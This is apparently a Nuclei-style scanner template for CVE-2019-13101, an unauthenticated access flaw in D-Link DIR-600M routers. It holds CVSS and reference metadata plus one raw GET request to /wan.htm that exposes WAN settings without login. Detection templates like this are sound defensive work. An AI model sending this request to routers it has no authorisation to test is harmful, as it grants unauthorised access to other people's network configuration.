id: CVE-2019-13101 info: name: D-Link DIR-600M - Authentication Bypass author: Suman_Kar severity: critical description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page. impact: | An attacker can bypass authentication and gain unauthorized access to the router's settings, potentially leading to further compromise of the network. remediation: | Update the router's firmware to the latest version provided by D-Link. reference: - https://github.com/d0x0/D-Link-DIR-600M - https://www.exploit-db.com/exploits/47250 - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - https://us.dlink.com/en/security-advisory - http://packetstormsecurity.com/files/153994/D-Link-DIR-600M-Wireless-N-150-Home-Router-Access-Bypass.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-13101 cwe-id: CWE-306 epss-score: 0.06909 epss-percentile: 0.93911 cpe: cpe:2.3:h:dlink:dir-600m:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink product: dir-600m tags: cve2019,cve,packetstorm,edb,dlink,router,iot http: - raw: - | GET /wan.htm HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} matchers-condition: and matchers: - type: word part: body words: - "/PPPoE/" - type: status status: - 200 # digest: 4a0a00473045022040244b26f38b4723a5f287f4e19182192fcb3046cd463b121034364d816363ba022100fb713221642e83baa1c7d5a9363ca18592ac5739a6d1297e4f3c4b6508f34200:922c64590222798bb761d5b6d8e72950